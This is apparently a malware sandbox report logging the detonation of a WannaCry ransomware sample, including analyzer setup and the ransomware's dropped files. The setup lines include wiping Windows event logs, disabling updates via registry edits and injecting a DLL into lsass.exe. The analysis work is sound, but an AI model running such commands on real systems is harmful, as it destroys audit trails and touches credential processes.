Detection(s): WanaCry WannaCry

Analysis

Category Package Started Completed Duration Options Log(s) MalScore
FILE 2025-12-08 17:08:23 2025-12-08 17:11:52 209 seconds Show Options Show Analysis Log 10.0
vnc_port=5900
2025-12-06 09:51:40,484 [root] INFO: Date set to: 20251208T09:08:23, timeout set to: 180
2025-12-08 09:08:23,015 [root] DEBUG: Starting analyzer from: C:\tmp2azv04x4
2025-12-08 09:08:23,015 [root] DEBUG: Storing results at: C:\fJCIHnd
2025-12-08 09:08:23,015 [root] DEBUG: Pipe server name: \\.\PIPE\UFAlzqhm
2025-12-08 09:08:23,015 [root] DEBUG: Python path: C:\Python38
2025-12-08 09:08:23,015 [root] INFO: analysis running as an admin
2025-12-08 09:08:23,015 [root] DEBUG: no analysis package configured, picking one for you
2025-12-08 09:08:23,015 [root] INFO: analysis package selected: "zip"
2025-12-08 09:08:23,015 [root] DEBUG: importing analysis package module: "modules.packages.zip"...
2025-12-08 09:08:23,031 [root] DEBUG: imported analysis package "zip"
2025-12-08 09:08:23,031 [root] DEBUG: initializing analysis package "zip"...
2025-12-08 09:08:23,031 [lib.common.common] INFO: wrapping
2025-12-08 09:08:23,031 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 09:08:23,031 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\wannacry.zip
2025-12-08 09:08:23,031 [root] INFO: Analyzer: Package modules.packages.zip does not specify a DLL option
2025-12-08 09:08:23,031 [root] INFO: Analyzer: Package modules.packages.zip does not specify a DLL_64 option
2025-12-08 09:08:23,031 [root] INFO: Analyzer: Package modules.packages.zip does not specify a loader option
2025-12-08 09:08:23,031 [root] INFO: Analyzer: Package modules.packages.zip does not specify a loader_64 option
2025-12-08 09:08:23,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-08 09:08:23,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-08 09:08:23,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-08 09:08:23,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-08 09:08:23,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-08 09:08:23,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-08 09:08:23,078 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-08 09:08:23,078 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-08 09:08:23,078 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 09:08:23,171 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2025-12-08 09:08:23,171 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 09:08:23,171 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-08 09:08:23,171 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-08 09:08:23,171 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-08 09:08:23,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-08 09:08:23,187 [modules.auxiliary.disguise] INFO: Disguising GUID to 6c5e7aca-a175-49bc-8b9d-4bc792b1dda4
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-08 09:08:23,187 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-08 09:08:23,187 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-08 09:08:23,187 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Human' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 09:08:23,187 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-08 09:08:23,187 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 09:08:23,187 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-08 09:08:23,187 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-08 09:08:23,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 09:08:23,281 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-08 09:08:23,312 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-08 09:08:23,312 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-08 09:08:23,312 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-08 09:08:23,312 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-08 09:08:23,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-08 09:08:23,312 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 448
2025-12-08 09:08:23,312 [lib.api.process] INFO: Monitor config for <Process 448 lsass.exe>: C:\tmp2azv04x4\dll\448.ini
2025-12-08 09:08:23,312 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-08 09:08:23,359 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-08 09:08:23,406 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-08 09:08:23,406 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-08 09:08:23,453 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-08 09:08:23,484 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-08 09:08:23,484 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-08 09:08:23,515 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-08 09:08:23,531 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-08 09:08:23,531 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-08 09:08:23,546 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-08 09:08:23,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-08 09:08:23,578 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-08 09:08:23,593 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-08 09:08:23,609 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-08 09:08:23,640 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-08 09:08:23,640 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-08 09:08:23,671 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-08 09:08:23,671 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-08 09:08:23,687 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-08 09:08:23,703 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-08 09:08:23,718 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-08 09:08:23,734 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-08 09:08:23,734 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-08 09:08:23,750 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-08 09:08:23,765 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-08 09:08:23,781 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-08 09:08:23,796 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-08 09:08:23,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-08 09:08:23,828 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-08 09:08:23,843 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 09:08:23,859 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 09:08:23,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-08 09:08:23,890 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-08 09:08:23,906 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-08 09:08:23,921 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-08 09:08:23,921 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-08 09:08:23,937 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-08 09:08:23,953 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-08 09:08:23,968 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-08 09:08:23,984 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-08 09:08:24,000 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-08 09:08:24,015 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-08 09:08:24,031 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-08 09:08:24,046 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-08 09:08:24,062 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-08 09:08:24,078 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-08 09:08:24,093 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-08 09:08:24,093 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-08 09:08:24,109 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-08 09:08:24,125 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-08 09:08:24,140 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-08 09:08:24,156 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-08 09:08:24,171 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-08 09:08:24,187 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-08 09:08:24,203 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-08 09:08:24,218 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-08 09:08:24,234 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-08 09:08:24,249 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-08 09:08:24,265 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-08 09:08:24,281 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-08 09:08:24,296 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-08 09:08:24,312 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-08 09:08:26,312 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor
2025-12-08 09:08:26,312 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:08:26,312 [root] DEBUG: Loader: Injecting process 448 with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:08:26,328 [root] DEBUG: 448: Python path set to 'C:\Python38'.
2025-12-08 09:08:26,328 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:26,328 [root] DEBUG: 448: TLS secret dump mode enabled.
2025-12-08 09:08:26,328 [root] DEBUG: 448: Monitor initialised: 64-bit capemon loaded in process 448 at 0x000007FEF30B0000, thread 2440, image base 0x00000000FF3B0000, stack from 0x0000000000B64000-0x0000000000B70000
2025-12-08 09:08:26,328 [root] DEBUG: 448: Commandline: C:\Windows\system32\lsass.exe
2025-12-08 09:08:26,328 [root] DEBUG: 448: Hooked 5 out of 5 functions
2025-12-08 09:08:26,328 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 09:08:26,328 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:08:26,328 [lib.api.process] INFO: Injected into 64-bit <Process 448 lsass.exe>
2025-12-08 09:08:26,328 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-08 09:08:26,328 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-08 09:08:26,328 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-08 09:08:26,328 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-08 09:08:26,328 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-08 09:08:26,328 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-08 09:08:26,328 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-08 09:08:26,328 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-08 09:08:26,328 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-08 09:08:26,343 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-08 09:08:26,343 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-08 09:08:31,390 [root] INFO: Restarting WMI Service
2025-12-08 09:08:33,421 [root] DEBUG: package modules.packages.zip does not support configure, ignoring
2025-12-08 09:08:33,421 [root] WARNING: configuration error for package modules.packages.zip: error importing data.packages.zip: No module named 'data.packages'
2025-12-08 09:08:33,421 [lib.common.zip_utils] DEBUG: Archive is encrypted, using default password value: infected
2025-12-08 09:08:35,640 [lib.common.zip_utils] INFO: Uploading C:\Users\user\AppData\Local\Temp\wannacry.exe to host
2025-12-08 09:08:35,656 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\wannacry.exe to files/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa; Size is 3514368; Max size: 100000000
2025-12-08 09:08:35,671 [modules.packages.zip] DEBUG: Missing file option, auto executing: ['wannacry.exe']
2025-12-08 09:08:35,671 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 09:08:35,687 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\wannacry.exe" with arguments "" with pid 3040
2025-12-08 09:08:35,687 [lib.api.process] INFO: Monitor config for <Process 3040 wannacry.exe>: C:\tmp2azv04x4\dll\3040.ini
2025-12-08 09:08:35,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:35,687 [root] DEBUG: Loader: Injecting process 3040 (thread 1956) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:35,703 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:08:35,703 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:35,703 [lib.api.process] INFO: Injected into 32-bit <Process 3040 wannacry.exe>
2025-12-08 09:08:37,703 [lib.api.process] INFO: Successfully resumed <Process 3040 wannacry.exe>
2025-12-08 09:08:37,718 [root] DEBUG: 3040: Python path set to 'C:\Python38'.
2025-12-08 09:08:37,718 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:37,718 [root] DEBUG: 3040: Dropped file limit defaulting to 100.
2025-12-08 09:08:37,718 [root] DEBUG: 3040: YaraInit: Compiled 41 rule files
2025-12-08 09:08:37,718 [root] DEBUG: 3040: YaraInit: Compiled rules saved to file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:08:37,718 [root] DEBUG: 3040: YaraScan: Scanning 0x00400000, size 0x35a000
2025-12-08 09:08:37,734 [root] DEBUG: 3040: Monitor initialised: 32-bit capemon loaded in process 3040 at 0x74260000, thread 1956, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:08:37,734 [root] DEBUG: 3040: Commandline: "C:\Users\user\AppData\Local\Temp\wannacry.exe"
2025-12-08 09:08:37,734 [root] DEBUG: 3040: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:08:37,734 [root] DEBUG: 3040: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:08:37,734 [root] DEBUG: 3040: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:08:37,734 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:08:37,734 [root] DEBUG: 3040: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:08:37,734 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:08:37,734 [root] DEBUG: 3040: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:08:37,750 [root] DEBUG: 3040: Hooked 611 out of 613 functions
2025-12-08 09:08:37,750 [root] DEBUG: 3040: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:08:37,750 [root] DEBUG: 3040: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x820000
2025-12-08 09:08:37,750 [root] INFO: Loaded monitor into process with pid 3040
2025-12-08 09:08:37,750 [root] DEBUG: 3040: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x00407875, thread 1956).
2025-12-08 09:08:37,750 [root] DEBUG: 3040: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:08:37,750 [root] DEBUG: 3040: YaraScan: Scanning 0x00400000, size 0x35a000
2025-12-08 09:08:37,765 [root] DEBUG: 3040: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:08:37,765 [root] DEBUG: 3040: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:08:37,765 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\b.wnry
2025-12-08 09:08:37,765 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\c.wnry
2025-12-08 09:08:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_bulgarian.wnry
2025-12-08 09:08:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_chinese (simplified).wnry
2025-12-08 09:08:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_chinese (traditional).wnry
2025-12-08 09:08:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_croatian.wnry
2025-12-08 09:08:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_czech.wnry
2025-12-08 09:08:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_danish.wnry
2025-12-08 09:08:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_dutch.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_english.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_filipino.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_finnish.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_french.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_german.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_greek.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_indonesian.wnry
2025-12-08 09:08:37,796 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_italian.wnry
2025-12-08 09:08:37,812 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_japanese.wnry
2025-12-08 09:08:37,812 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_korean.wnry
2025-12-08 09:08:37,812 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_latvian.wnry
2025-12-08 09:08:37,812 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_norwegian.wnry
2025-12-08 09:08:37,812 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_polish.wnry
2025-12-08 09:08:37,812 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_portuguese.wnry
2025-12-08 09:08:37,812 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_romanian.wnry
2025-12-08 09:08:37,828 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_russian.wnry
2025-12-08 09:08:37,828 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_slovak.wnry
2025-12-08 09:08:37,828 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_spanish.wnry
2025-12-08 09:08:37,828 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_swedish.wnry
2025-12-08 09:08:37,828 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_turkish.wnry
2025-12-08 09:08:37,828 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\msg\m_vietnamese.wnry
2025-12-08 09:08:37,828 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\r.wnry
2025-12-08 09:08:37,875 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\s.wnry
2025-12-08 09:08:37,875 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\t.wnry
2025-12-08 09:08:37,875 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\taskdl.exe
2025-12-08 09:08:37,875 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\taskse.exe
